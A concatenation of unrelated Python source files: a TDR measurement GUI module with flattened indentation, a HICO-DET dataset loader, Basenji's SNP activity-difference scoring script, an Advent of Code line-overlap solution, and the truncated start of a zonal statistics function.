if self.checkSaveCharts.isChecked():
if self.TDRcurrentShadowPlot is not None:
self.TDRshadowFigure.savefig(chart_file_name,
dpi=300,
format="png",
pad_inches=0.5,
orientation='portrait',
papertype="letter",
edgecolor="black")
Popup.info("TDR results saved to: " + results_subdir, "Save TDR Results")
except Exception as e:
Popup.error(e)
def buttonTDRRunSingle_clicked(self):
# print("Tdr::buttonTDRRunSingle_clicked")
try:
Connect.getDevice().App.Stop()
Connect.getDevice().App.setTab("TDR")
self.buttonTDRRunSingle.setEnabled(False)
self.buttonTDRRefresh.setEnabled(False)
self.buttonTDRResetView.setEnabled(False)
self.buttonTDRSaveResults.setEnabled(False)
self.buttonTDRClear.setEnabled(False)
self.numTDRCursorX1.setEnabled(False)
self.numTDRCursorX2.setEnabled(False)
QApplication.processEvents()
Connect.getDevice().RunSingle()
Connect.getDevice().WaitForRunToComplete(120.0)
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
finally:
self.buttonTDRRunSingle.setEnabled(True)
self.buttonTDRRefresh.setEnabled(True)
self.buttonTDRResetView.setEnabled(True)
self.buttonTDRSaveResults.setEnabled(True)
self.buttonTDRClear.setEnabled(True)
self.numTDRCursorX1.setEnabled(True)
self.numTDRCursorX2.setEnabled(True)
pass
def numTDRCursorX1_editingFinished(self):
# print("Tdr::numTDRCursorX1_editingFinished")
try:
Connect.getDevice().Tdr.Chart.setCursValue(0, math.floor(self.numTDRCursorX1.value()))
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
def numTDRCursorX2_editingFinished(self):
# print("Tdr::numTDRCursorX2_editingFinished")
try:
Connect.getDevice().Tdr.Chart.setCursValue(1, math.floor(self.numTDRCursorX2.value()))
self.refreshResults(0x1)
except Exception as e:
Popup.error(e)
# override
def editResultsName_editingFinished(self):
super().editResultsName_editingFinished()
# print("Tdr::editResultsName_editingFinished()")
if self.TDRcurrentPlot is not None:
self.TDRcurrentPlot.set_title(
"TDR" if self.editResultsName.text() == "" else (self.editResultsName.text() + "\nTDR"))
self.TDRchartCanvas.draw()
if self.TDRcurrentShadowPlot is not None:
self.TDRcurrentShadowPlot.set_title(
"TDR" if self.editResultsName.text() == "" else (self.editResultsName.text() + "\nTDR"))
self.TDRshadowCanvas.draw()
# override
def setConnectionDependentEnables(self, newValue: bool):
super().setConnectionDependentEnables(newValue)
# print("Tdr::setConnectionDependentEnables(), newValue=", newValue)
self.buttonTDRRefresh.setEnabled(newValue)
self.buttonTDRRunSingle.setEnabled(newValue)
self.buttonTDRResetView.setEnabled(newValue)
self.buttonTDRClear.setEnabled(newValue)
self.buttonTDRSaveResults.setEnabled(newValue)
self.numTDRCursorX1.setEnabled(newValue)
self.numTDRCursorX2.setEnabled(newValue)
# override
def refreshResults(self, flag: int):
super().refreshResults(flag)
# print("Tdr::refreshResults()")
if (flag & 0x1) == 0:
return
# Fetch cursor positions
x1 = Connect.getDevice().Tdr.Chart.getCursValue(0)
x2 = Connect.getDevice().Tdr.Chart.getCursValue(1)
# print("CursorX1 =", x1, ", CursorX2 =", x2);
self.numTDRCursorX1.blockSignals(True)
self.numTDRCursorX2.blockSignals(True)
self.numTDRCursorX1.setValue(x1)
self.numTDRCursorX2.setValue(x2)
self.numTDRCursorX1.blockSignals(False)
self.numTDRCursorX2.blockSignals(False)
if x1 > x2:
tmp = x1
x1 = x2
x2 = tmp
# Fetch X-axis mapping
offsetPS = Connect.getDevice().Tdr.Cfg.getOffsetPS()
spanPS = Connect.getDevice().Tdr.Cfg.getSpanPS()
reclen = Connect.getDevice().Tdr.Cfg.getReclen()
# print("offsetPS =", offsetPS, ", spanPS =", spanPS, ", reclen =", reclen);
# Fetch important settings
bw = Connect.getDevice().Tdr.Cfg.getBWGHz()
usingDiff = Connect.getDevice().Tdr.Cfg.getUseDiff()
avg = Connect.getDevice().Tdr.Cfg.getAvg()
calState = Connect.getDevice().Tdr.getCalState()
self.TDRchartLeft = Connect.getDevice().Tdr.Chart.getLeftPS()
self.TDRchartWidth = Connect.getDevice().Tdr.Chart.getWidthPS()
# print("bw =", bw, ", usingDiff =", usingDiff, ", avg =", avg, ", calState =", calState);
# Fetch short calibration file names and contents, and extract date-time
shortCalFile = Connect.getDevice().Tdr.getShortCalFile()
shortCal = Connect.getDevice().File.Fetch(shortCalFile).decode(encoding='utf-8')
shortCalLines = shortCal.splitlines()
shortCalDateTime = "UNK"
for index in range(len(shortCalLines)):
cols = shortCalLines[index].split(',')
if len(cols) == 2 and cols[0].strip() == "DATETIME":
shortCalDateTime = cols[1].strip()[-20:]
break
pass
# Fetch termination calibration file names and contents, and extract date-time
termCalFile = Connect.getDevice().Tdr.getTermCalFile()
termCal = Connect.getDevice().File.Fetch(termCalFile).decode(encoding='utf-8')
termCalLines = termCal.splitlines()
termCalDateTime = "UNK"
for index in range(len(termCalLines)):
cols = termCalLines[index].split(',')
if len(cols) == 2 and cols[0].strip() == "DATETIME":
termCalDateTime = cols[1].strip()[-20:]
break
pass
# Fetch trace data data_y, calculate min, max, average
data_y = Connect.getDevice().Tdr.getBinary()
SENTINEL = 999999.999
minimum = SENTINEL
maximum = -SENTINEL
accum = 0.0
count = 0
data_x = numpy.empty(len(data_y), float)
for index in range(reclen):
ps = offsetPS + (index * spanPS) / reclen
ohm = data_y[index]
data_x[index] = ps
if x1 <= ps <= x2:
if ohm < minimum:
minimum = ohm
if ohm > maximum:
maximum = ohm
accum = accum + ohm
count = count + 1
pass
pass
# print("TDR count =", count, "minimum =", minimum, "maximum =", maximum, "accum =", accum)
# Duplicate values in second array for area between two cursors
selected_x = numpy.empty(count, float)
selected_y = numpy.empty(count, float)
selected_count = 0
for index in range(reclen):
if x1 <= data_x[index] <= x2:
selected_x[selected_count] = data_x[index]
selected_y[selected_count] = data_y[index]
selected_count = selected_count + 1
pass
pass
# Assign results into Gui widgets
self.editTDRShortCalib.setText(shortCalDateTime)
self.editTDRTermCalib.setText(termCalDateTime)
# Build meta-data string
metaData = "Record len: " + ("{:.0f}".format(reclen)) + "\n" + \
"Averages: " + ("{:.0f}".format(avg)) + "\n" + \
"B/W limit: " + ("0 GHz" if bw == 0 else "{:.3f} GHz".format(bw)) + "\n" + \
"Differential: " + ("Yes" if usingDiff else "No") + "\n\n" + \
"Selected region:\n" + \
" min " + ("n/a" if minimum == SENTINEL else "{:.2f} ohm".format(minimum)) + "\n" + \
" max " + ("n/a" if maximum == -SENTINEL else "{:.2f} ohm".format(maximum)) + "\n" + \
" avg " + ("n/a" if count == 0 else "{:.2f} ohm".format(accum / count)) + "\n" + \
" (" + ("{:.0f} samples".format(count)) + ")"
# Build chart for screen display
self.TDRchartFigure.clear()
plot = self.TDRchartFigure.add_subplot(1, 1, 1)
plot.plot(data_x, data_y)
plot.plot(selected_x, selected_y)
plot.set_title("TDR" if self.editResultsName.text() == "" else self.editResultsName.text() + "\nTDR",
fontsize=9)
plot.set_xlabel("ps", fontsize=9)
plot.set_ylabel("ohm", fontsize=9)
plot.set_xlim(self.TDRchartLeft, self.TDRchartLeft+self.TDRchartWidth)
plot.grid()
t = plot.text(0.95, 0.95, metaData,
backgroundcolor="lightyellow",
verticalalignment="top",
horizontalalignment="right",
fontsize=8,
transform=plot.transAxes
)
t.set_bbox(dict(facecolor='lightyellow', alpha=0.6))
self.TDRchartCanvas.draw()
self.TDRcurrentPlot = plot
# Create duplicate chart for "save" function so not dependent on viewing configuration
self.TDRshadowFigure.clear()
plot2 = self.TDRshadowFigure.add_subplot(1, 1, 1)
plot2.plot(data_x, data_y)
plot2.plot(selected_x, selected_y)
plot2.set_title("TDR" if self.editResultsName.text() == "" else self.editResultsName.text() + "\nTDR",
fontsize=9)
plot2.set_xlabel("ps", fontsize=9)
plot2.set_ylabel("ohm", fontsize=9)
plot.set_xlim(self.TDRchartLeft, self.TDRchartLeft+self.TDRchartWidth)
plot2.grid()
t = plot2.text(0.95, 0.95, metaData,
backgroundcolor="lightyellow",
verticalalignment="top",
horizontalalignment="right",
fontsize=8,
transform=plot2.transAxes
)
t.set_bbox(dict(facecolor='lightyellow', alpha=0.6))
self.TDRshadowCanvas.draw()
self.TDRcurrentShadowPlot = plot2
# build log file contents
self.TDRResultsDateTime = datetime.datetime.now()
header_str = "Results, Date, Time, Parameter, Index, x, Value"
results_str = self.editResultsName.text().strip()
date_str = self.TDRResultsDateTime.strftime("%m/%d/%Y")
time_str = self.TDRResultsDateTime.strftime("%H:%M:%S")
try:
self.TDRLogFileContents = header_str + "\n"
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"X1" + "," + "-1" + "," + "-1" + "," + "{:.2f}".format(x1) + "\n"
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"X2" + "," + "-1" + "," + "-1" + "," + "{:.2f}".format(x2) + "\n"
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"SELCNT" + "," + "-1" + "," + "-1" + "," + "{:.0f}".format(count) + "\n"
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"SELMIN" + "," + "-1" + "," + "-1" + "," + "{:.2f}".format(minimum) + "\n"
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"SELMAX" + "," + "-1" + "," + "-1" + "," + "{:.2f}".format(maximum) + "\n"
average_number = -1.0
if count > 0:
average_number = accum / count
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"SELAVG" + "," + "-1" + "," + "-1" + "," + "{:.2f}".format(average_number) + "\n"
for index in range(reclen):
index_str = "{:.0f}".format(index)
x_value_str = "{:.3f}".format(offsetPS + (index * spanPS) / reclen)
y_value_str = "{:.2f}".format(data_y[index])
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"TDR" + "," + index_str + "," + x_value_str + "," + y_value_str + "\n"
pass
for index in range(len(selected_y)):
index_str = "{:.0f}".format(index)
x_value_str = "{:.3f}".format(selected_x[index])
y_value_str = "{:.2f}".format(selected_y[index])
self.TDRLogFileContents = self.TDRLogFileContents + \
'"' + results_str + "\"," + date_str + "," + time_str + ", " + \
"SELTDR" + "," + index_str + "," + x_value_str + "," + y_value_str + "\n"
pass
except Exception as e:
print("Problem building pivot file contents: ", e)
raise e
# EOF
|
import json
import numpy as np
import os
import os.path as osp
from PIL import Image
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
import random
import torch
from torch.utils.data import Dataset
class HICODetDataset(Dataset):
    """HICO-DET style human-object-interaction dataset.

    Each item is (image, target, file_name) where target holds object boxes
    and labels plus HOI relation one-hot labels ('rel_labels') and
    subject-center -> object-center vectors ('rel_vecs').
    """

    def __init__(self,
                 cfg,
                 data_root,
                 transform=None,
                 istrain=False,
                 ):
        """
        Args:
            cfg: config node; reads DATASET.REL_NUM_CLASSES and
                TRANSFORMER.NUM_QUERIES.
            data_root: absolute root path for train or val data folder
            transform: train_transform or eval_transform or prediction_transform
            istrain: unused here; kept for interface compatibility.
        """
        self.num_classes_verb = cfg.DATASET.REL_NUM_CLASSES
        self.data_root = data_root
        self.labels_path = osp.join(osp.abspath(
            self.data_root), 'anno.json')
        self.transform = transform
        # Use a context manager so the annotation file handle is closed
        # (the original leaked it via json.load(open(...))).
        with open(self.labels_path, 'r') as anno_file:
            self.hoi_annotations = json.load(anno_file)
        # Keep only images whose object count fits the query budget and whose
        # HOI pairs reference valid object indexes.
        self.ids = []
        for i, hico in enumerate(self.hoi_annotations):
            flag_bad = 0
            if len(hico['annotations']) > cfg.TRANSFORMER.NUM_QUERIES:
                flag_bad = 1
                continue
            for hoi in hico['hoi_annotation']:
                if hoi['subject_id'] >= len(hico['annotations']) or hoi[
                        'object_id'] >= len(hico['annotations']):
                    flag_bad = 1
                    break
            if flag_bad == 0:
                self.ids.append(i)
        # Relation class id 0 is reserved for "no relation".
        self.neg_rel_id = 0

    def __len__(self):
        """Number of images that survived annotation filtering."""
        return len(self.ids)

    def multi_dense_to_one_hot(self, labels, num_classes):
        """Convert dense relation ids to a clipped multi-hot vector.

        Args:
            labels: 1-D integer array of relation class ids in [0, num_classes).
            num_classes: total class count INCLUDING the background class 0.

        Returns:
            1-D float array of length num_classes - 1 (background column 0 is
            dropped), with duplicated labels clipped to 1.
        """
        num_labels = labels.shape[0]
        index_offset = np.arange(num_labels) * num_classes
        labels_one_hot = np.zeros((num_labels, num_classes))
        labels_one_hot.flat[index_offset + labels.ravel()] = 1
        # Sum the per-label rows, drop the background column, clip counts to 1.
        one_hot = np.sum(labels_one_hot, axis=0)[1:]
        in_valid = np.where(one_hot > 1)[0]
        one_hot[in_valid] = 1
        return one_hot

    def __getitem__(self, index):
        """Load one image and build its detection + relation target dict."""
        ann_id = self.ids[index]
        file_name = self.hoi_annotations[ann_id]['file_name']
        img_path = os.path.join(self.data_root, file_name)
        anns = self.hoi_annotations[ann_id]['annotations']
        hoi_anns = self.hoi_annotations[ann_id]['hoi_annotation']
        if not osp.exists(img_path):
            # The original called logging.error() here, but `logging` was never
            # imported in this module, so a missing file surfaced as a
            # NameError. Raise FileNotFoundError carrying the path instead.
            raise FileNotFoundError("Cannot find image data: " + img_path)
        img = Image.open(img_path).convert('RGB')
        w, h = img.size
        num_object = len(anns)
        num_rels = len(hoi_anns)
        boxes = []
        labels = []
        no_object = False
        if num_object == 0:
            # no gt boxes
            no_object = True
            boxes = np.array([]).reshape(-1, 4)
            labels = np.array([]).reshape(-1,)
        else:
            for k in range(num_object):
                ann = anns[k]
                boxes.append(np.asarray(ann['bbox']))
                # some annotations store category_id as a string with newlines
                if isinstance(ann['category_id'], str):
                    ann['category_id'] = int(ann['category_id'].replace('\n', ''))
                cls_id = int(ann['category_id'])
                labels.append(cls_id)
            boxes = np.vstack(boxes)
        boxes = torch.from_numpy(boxes.reshape(-1, 4).astype(np.float32))
        labels = np.array(labels).reshape(-1,)
        target = dict(
            boxes=boxes,
            labels=labels
        )
        if self.transform is not None:
            img, target = self.transform(
                img, target
            )
        # NOTE(review): assumes the transform keeps target['labels'] as a
        # numpy array — confirm against the transform implementations.
        target['labels'] = torch.from_numpy(target['labels']).long()
        boxes = target['boxes']
        hoi_labels = []
        hoi_boxes = []
        if num_object == 0:
            hoi_boxes = torch.from_numpy(np.array([]).reshape(-1, 4))
            hoi_labels = np.array([]).reshape(-1, self.num_classes_verb)
        else:
            for k in range(num_rels):
                hoi = hoi_anns[k]
                if not isinstance(hoi['category_id'], list):
                    hoi['category_id'] = [hoi['category_id']]
                hoi_label_np = np.array(hoi['category_id'])
                hoi_labels.append(self.multi_dense_to_one_hot(hoi_label_np,
                                                              self.num_classes_verb + 1))
                # relation vector = subject box center -> object box center
                sub_ct_coord = boxes[hoi['subject_id']][..., :2]
                obj_ct_coord = boxes[hoi['object_id']][..., :2]
                hoi_boxes.append(torch.cat([sub_ct_coord, obj_ct_coord], dim=-1).reshape(-1, 4))
        hoi_labels = np.array(hoi_labels).reshape(-1, self.num_classes_verb)
        target['rel_labels'] = torch.from_numpy(hoi_labels)
        if len(hoi_boxes) == 0:
            target['rel_vecs'] = torch.from_numpy(np.array([]).reshape(-1, 4)).float()
        else:
            target['rel_vecs'] = torch.cat(hoi_boxes).reshape(-1, 4).float()
        target['size'] = torch.from_numpy(np.array([h, w]))
        return img, target, file_name
|
#!/usr/bin/env python
# Copyright 2017 Calico LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from __future__ import print_function
from optparse import OptionParser
import gc
import json
import pdb
import pickle
import os
from queue import Queue
import sys
from threading import Thread
import time
import h5py
import numpy as np
import pandas as pd
import pysam
import tensorflow as tf
if tf.__version__[0] == '1':
tf.compat.v1.enable_eager_execution()
from basenji import dna_io
from basenji import seqnn
from basenji import vcf as bvcf
from basenji import stream
from basenji_sad import SNPWorker, initialize_output_h5, write_pct, write_snp
'''
basenji_sad_ref.py
Compute SNP Activity Difference (SAD) scores for SNPs in a VCF file.
This versions saves computation by clustering nearby SNPs in order to
make a single reference prediction for several SNPs.
'''
################################################################################
# main
################################################################################
def main():
  """Compute per-SNP SAD scores for a VCF file.

  Nearby SNPs are clustered so one reference prediction is shared across the
  cluster's alternate alleles, saving model compute. Results are written to an
  HDF5 file in the output directory (optionally via worker threads).
  """
  usage = 'usage: %prog [options] <params_file> <model_file> <vcf_file>'
  parser = OptionParser(usage)
  parser.add_option('-c', dest='center_pct',
      default=0.25, type='float',
      help='Require clustered SNPs lie in center region [Default: %default]')
  parser.add_option('-f', dest='genome_fasta',
      default='%s/data/hg19.fa' % os.environ['BASENJIDIR'],
      help='Genome FASTA for sequences [Default: %default]')
  parser.add_option('--flip', dest='flip_ref',
      default=False, action='store_true',
      help='Flip reference/alternate alleles when simple [Default: %default]')
  parser.add_option('-n', dest='norm_file',
      default=None,
      help='Normalize SAD scores')
  parser.add_option('-o', dest='out_dir',
      default='sad',
      help='Output directory for tables and plots [Default: %default]')
  parser.add_option('-p', dest='processes',
      default=None, type='int',
      help='Number of processes, passed by multi script')
  parser.add_option('--pseudo', dest='log_pseudo',
      default=1, type='float',
      help='Log2 pseudocount [Default: %default]')
  parser.add_option('--rc', dest='rc',
      default=False, action='store_true',
      help='Average forward and reverse complement predictions [Default: %default]')
  parser.add_option('--shifts', dest='shifts',
      default='0', type='str',
      help='Ensemble prediction shifts [Default: %default]')
  parser.add_option('--stats', dest='sad_stats',
      default='SAD',
      help='Comma-separated list of stats to save. [Default: %default]')
  parser.add_option('-t', dest='targets_file',
      default=None, type='str',
      help='File specifying target indexes and labels in table format')
  parser.add_option('--ti', dest='track_indexes',
      default=None, type='str',
      help='Comma-separated list of target indexes to output BigWig tracks')
  parser.add_option('--threads', dest='threads',
      default=False, action='store_true',
      help='Run CPU math and output in a separate thread [Default: %default]')
  parser.add_option('-u', dest='penultimate',
      default=False, action='store_true',
      help='Compute SED in the penultimate layer [Default: %default]')
  (options, args) = parser.parse_args()

  if len(args) == 3:
    # single worker
    params_file = args[0]
    model_file = args[1]
    vcf_file = args[2]

  elif len(args) == 5:
    # multi worker: options come pickled from the coordinating multi script,
    # and each worker writes into its own job subdirectory.
    options_pkl_file = args[0]
    params_file = args[1]
    model_file = args[2]
    vcf_file = args[3]
    worker_index = int(args[4])

    # load options
    options_pkl = open(options_pkl_file, 'rb')
    options = pickle.load(options_pkl)
    options_pkl.close()

    # update output directory
    options.out_dir = '%s/job%d' % (options.out_dir, worker_index)

  else:
    parser.error('Must provide parameters and model files and QTL VCF file')

  if not os.path.isdir(options.out_dir):
    os.mkdir(options.out_dir)

  if options.track_indexes is None:
    options.track_indexes = []
  else:
    options.track_indexes = [int(ti) for ti in options.track_indexes.split(',')]
    if not os.path.isdir('%s/tracks' % options.out_dir):
      os.mkdir('%s/tracks' % options.out_dir)

  # parse comma-separated option strings into lists
  options.shifts = [int(shift) for shift in options.shifts.split(',')]
  options.sad_stats = options.sad_stats.split(',')

  #################################################################
  # read parameters and targets

  # read model parameters
  with open(params_file) as params_open:
    params = json.load(params_open)
  params_model = params['model']
  params_train = params['train']

  if options.targets_file is None:
    target_slice = None
  else:
    targets_df = pd.read_csv(options.targets_file, sep='\t', index_col=0)
    target_ids = targets_df.identifier
    target_labels = targets_df.description
    target_slice = targets_df.index

  if options.penultimate:
    parser.error('Not implemented for TF2')

  #################################################################
  # setup model

  seqnn_model = seqnn.SeqNN(params_model)
  seqnn_model.restore(model_file)
  seqnn_model.build_slice(target_slice)
  seqnn_model.build_ensemble(options.rc, options.shifts)

  num_targets = seqnn_model.num_targets()
  if options.targets_file is None:
    target_ids = ['t%d' % ti for ti in range(num_targets)]
    target_labels = ['']*len(target_ids)

  #################################################################
  # load SNPs

  # filter for worker SNPs
  if options.processes is not None:
    # determine boundaries
    num_snps = bvcf.vcf_count(vcf_file)
    worker_bounds = np.linspace(0, num_snps, options.processes+1, dtype='int')

    # read sorted SNPs from VCF
    snps = bvcf.vcf_snps(vcf_file, require_sorted=True, flip_ref=options.flip_ref,
                         validate_ref_fasta=options.genome_fasta,
                         start_i=worker_bounds[worker_index],
                         end_i=worker_bounds[worker_index+1])
  else:
    # read sorted SNPs from VCF
    snps = bvcf.vcf_snps(vcf_file, require_sorted=True, flip_ref=options.flip_ref,
                         validate_ref_fasta=options.genome_fasta)

  # cluster SNPs by position
  snp_clusters = cluster_snps(snps, params_model['seq_length'], options.center_pct)

  # delimit sequence boundaries
  [sc.delimit(params_model['seq_length']) for sc in snp_clusters]

  # open genome FASTA
  genome_open = pysam.Fastafile(options.genome_fasta)

  # make SNP sequence generator: yields the cluster's reference 1-hot first,
  # then one alternate 1-hot per SNP (same order as the prediction loop below)
  def snp_gen():
    for sc in snp_clusters:
      snp_1hot_list = sc.get_1hots(genome_open)
      for snp_1hot in snp_1hot_list:
        yield snp_1hot

  #################################################################
  # setup output

  snp_flips = np.array([snp.flipped for snp in snps], dtype='bool')

  sad_out = initialize_output_h5(options.out_dir, options.sad_stats,
                                 snps, target_ids, target_labels)

  if options.threads:
    snp_threads = []
    snp_queue = Queue()
    # currently a single worker thread; range(1) left for easy expansion
    for i in range(1):
      sw = SNPWorker(snp_queue, sad_out, options.sad_stats, options.log_pseudo)
      sw.start()
      snp_threads.append(sw)

  #################################################################
  # predict SNP scores, write output

  # initialize predictions stream
  preds_stream = stream.PredStreamGen(seqnn_model, snp_gen(), params['train']['batch_size'])

  # predictions index
  pi = 0

  # SNP index
  si = 0

  for snp_cluster in snp_clusters:
    # first stream entry is the cluster's shared reference prediction
    ref_preds = preds_stream[pi]
    pi += 1

    for snp in snp_cluster.snps:
      # print(snp, flush=True)

      alt_preds = preds_stream[pi]
      pi += 1

      # NOTE(review): this swap rebinds ref_preds, so a flipped SNP changes
      # the "reference" seen by later SNPs in the same cluster — confirm
      # whether that is intended.
      if snp_flips[si]:
        ref_preds, alt_preds = alt_preds, ref_preds

      if options.threads:
        # queue SNP
        snp_queue.put((ref_preds, alt_preds, si))
      else:
        # process SNP
        write_snp(ref_preds, alt_preds, sad_out, si,
                  options.sad_stats, options.log_pseudo)

      # update SNP index
      si += 1

  # finish queue
  if options.threads:
    print('Waiting for threads to finish.', flush=True)
    snp_queue.join()

  # close genome
  genome_open.close()

  ###################################################
  # compute SAD distributions across variants

  write_pct(sad_out, options.sad_stats)
  sad_out.close()
def cluster_snps(snps, seq_len, center_pct):
  """Cluster a sorted list of SNPs into regions that will satisfy
  the required center_pct."""
  max_cluster_span = int(seq_len * center_pct)

  clusters = []
  open_chr = None
  open_pos0 = None

  for snp in snps:
    # same chromosome and within the span of the cluster's first SNP?
    if snp.chr == open_chr and snp.pos < open_pos0 + max_cluster_span:
      clusters[-1].add_snp(snp)
    else:
      # start a new cluster anchored at this SNP
      fresh = SNPCluster()
      fresh.add_snp(snp)
      clusters.append(fresh)
      open_chr = snp.chr
      open_pos0 = snp.pos

  return clusters
class SNPCluster:
  """A group of nearby SNPs sharing one reference sequence window."""

  def __init__(self):
    # member SNPs and the genomic window that covers them
    self.snps = []
    self.chr = None
    self.start = None
    self.end = None

  def add_snp(self, snp):
    """Append a SNP to the cluster."""
    self.snps.append(snp)

  def delimit(self, seq_len):
    """Fix a window of seq_len centered on the SNP span and set each SNP's
    0-based position within it."""
    positions = [snp.pos for snp in self.snps]
    midpoint = (np.min(positions) + np.max(positions)) // 2

    self.chr = self.snps[0].chr
    self.start = midpoint - seq_len // 2
    self.end = self.start + seq_len

    for snp in self.snps:
      # SNP positions are 1-based; seq_pos is 0-based within the window
      snp.seq_pos = snp.pos - 1 - self.start

  def get_1hots(self, genome_open):
    """Return 1-hot codings: reference sequence first, then one alternate
    sequence per SNP (first alt allele only)."""
    # fetch reference, padding with N where the window leaves the chromosome
    if self.start < 0:
      ref_seq = 'N'*(-self.start) + genome_open.fetch(self.chr, 0, self.end).upper()
    else:
      ref_seq = genome_open.fetch(self.chr, self.start, self.end).upper()
    shortfall = (self.end - self.start) - len(ref_seq)
    if shortfall > 0:
      ref_seq += 'N'*shortfall

    # verify each SNP's reference allele against the fetched sequence
    for snp in self.snps:
      allele_len = len(snp.ref_allele)
      fetched = ref_seq[snp.seq_pos:snp.seq_pos+allele_len]
      if snp.ref_allele != fetched:
        print('ERROR: %s does not match reference %s' % (snp, fetched), file=sys.stderr)
        exit(1)

    # 1 hot code reference sequence
    ref_1hot = dna_io.dna_1hot(ref_seq)
    seqs1_list = [ref_1hot]

    # make alternative 1 hot coded sequences
    # (assuming SNP is 1-based indexed)
    for snp in self.snps:
      seqs1_list.append(
          make_alt_1hot(ref_1hot, snp.seq_pos, snp.ref_allele, snp.alt_alleles[0]))

    return seqs1_list
def make_alt_1hot(ref_1hot, snp_seq_pos, ref_allele, alt_allele):
  """Return alternative allele one hot coding.

  Args:
    ref_1hot: 1-hot coding of the reference sequence.
    snp_seq_pos: 0-based position of the allele within the sequence.
    ref_allele: reference allele string.
    alt_allele: alternate allele string.

  Returns:
    Copy of ref_1hot with the alternate allele substituted in (SNP,
    deletion, or insertion depending on relative allele lengths).
  """
  ref_n = len(ref_allele)
  alt_n = len(alt_allele)

  # copy reference
  alt_1hot = np.copy(ref_1hot)

  if alt_n == ref_n:
    # SNP: in-place substitution
    dna_io.hot1_set(alt_1hot, snp_seq_pos, alt_allele)

  elif ref_n > alt_n:
    # deletion; VCF indels repeat the anchor base, so it must match
    delete_len = ref_n - alt_n
    if (ref_allele[0] == alt_allele[0]):
      dna_io.hot1_delete(alt_1hot, snp_seq_pos+1, delete_len)
    else:
      # fixed typo in the original message: "Delection" -> "Deletion"
      print('WARNING: Deletion first nt does not match: %s %s' % (ref_allele, alt_allele), file=sys.stderr)

  else:
    # insertion; same anchor-base requirement
    if (ref_allele[0] == alt_allele[0]):
      dna_io.hot1_insert(alt_1hot, snp_seq_pos+1, alt_allele[1:])
    else:
      print('WARNING: Insertion first nt does not match: %s %s' % (ref_allele, alt_allele), file=sys.stderr)

  return alt_1hot
################################################################################
# __main__
################################################################################
# Run the SAD pipeline when executed as a script.
if __name__ == '__main__':
  main()
|
from dataclasses import InitVar
from dataclasses import dataclass
from dataclasses import field
from typing import Iterable
from typing import List
from typing import Tuple
@dataclass(frozen=True)
class Line:
    """An immutable integer line segment from (x1, y1) to (x2, y2)."""
    x1: int
    y1: int
    x2: int
    y2: int

    def is_straight(self) -> bool:
        """True when the segment is horizontal or vertical."""
        return self.y1 == self.y2 or self.x1 == self.x2

    def as_tuple(self) -> Tuple[int, int, int, int]:
        """Return the endpoints flattened as (x1, y1, x2, y2)."""
        return (self.x1, self.y1, self.x2, self.y2)
@dataclass
class Diagram:
    """A grid counting how many lines pass through each point."""
    input_lines: InitVar
    lines: List[Line] = field(init=False, default_factory=list)
    points: List[List[int]] = field(init=False, default_factory=list)

    def __post_init__(self, input_lines: Iterable[Tuple[List[str]]]):
        # parse lines while tracking the grid size needed to hold them
        max_x, max_y = 0, 0
        for start, end in input_lines:
            parsed = Line(*map(int, start), *map(int, end))
            max_x = max(max_x, parsed.x1 + 1, parsed.x2 + 1)
            max_y = max(max_y, parsed.y1 + 1, parsed.y2 + 1)
            self.lines.append(parsed)
        # empty coverage grid sized to fit every endpoint
        self.points = [[0] * max_x for _ in range(max_y)]

    def plot_point(self, x: int, y: int):
        """Record one more line covering (x, y)."""
        self.points[y][x] += 1
def walk(lines: Iterable[Line]) -> Iterable[Tuple[int, int]]:
    """Yield every integer point on each line using Bresenham's algorithm.

    The integer incremental-error form handles all octants:
    https://en.wikipedia.org/wiki/Bresenham's_line_algorithm#All_cases
    """
    for line in lines:
        x, y, x_end, y_end = line.as_tuple()
        step_x = 1 if x < x_end else -1
        step_y = 1 if y < y_end else -1
        dx = abs(x_end - x)
        dy = -abs(y_end - y)
        error = dx + dy
        while True:
            yield x, y
            if (x, y) == (x_end, y_end):
                break
            doubled = 2 * error
            if doubled >= dy:
                error += dy
                x += step_x
            if doubled <= dx:
                error += dx
                y += step_y
def solution_1(input: List[str]) -> int:
    """Count points covered by two or more horizontal/vertical lines."""
    pairs = [(start.split(","), end.split(","))
             for row in input
             for start, end in [row.split(" -> ")]]
    diagram = Diagram(pairs)
    straight_only = (line for line in diagram.lines if line.is_straight())
    for x, y in walk(straight_only):
        diagram.plot_point(x, y)
    return len([count for row in diagram.points for count in row if count > 1])
def solution_2(input: List[str]) -> int:
    """Count points covered by two or more lines, diagonals included."""
    pairs = [(start.split(","), end.split(","))
             for row in input
             for start, end in [row.split(" -> ")]]
    diagram = Diagram(pairs)
    for x, y in walk(diagram.lines):
        diagram.plot_point(x, y)
    return len([count for row in diagram.points for count in row if count > 1])
|
import numpy as np
import pandas as pd
def zonal_stats(zones, values, stats=['mean', 'max', 'min', 'std', 'var']):
    """Calculate statistics for each zone defined by a zone dataset, based on
    values from another dataset (value raster).

    A single output value is computed for each zone in the input zone dataset.

    Parameters
    ----------
    zones: xarray.DataArray,
        Zones are defined by cells that have the same value,
        whether or not they are contiguous. The input zone layer defines
        the shape, values, and locations of the zones. An integer field
        in the zone input is specified to define the zones.
    values: xarray.DataArray,
        values represent the value raster to be summarized as either integer or float.
        The value raster contains the input values used in calculating
        the output statistic for each zone.
    stats: list of strings or dictionary<stat_name: function(zone_values)>.
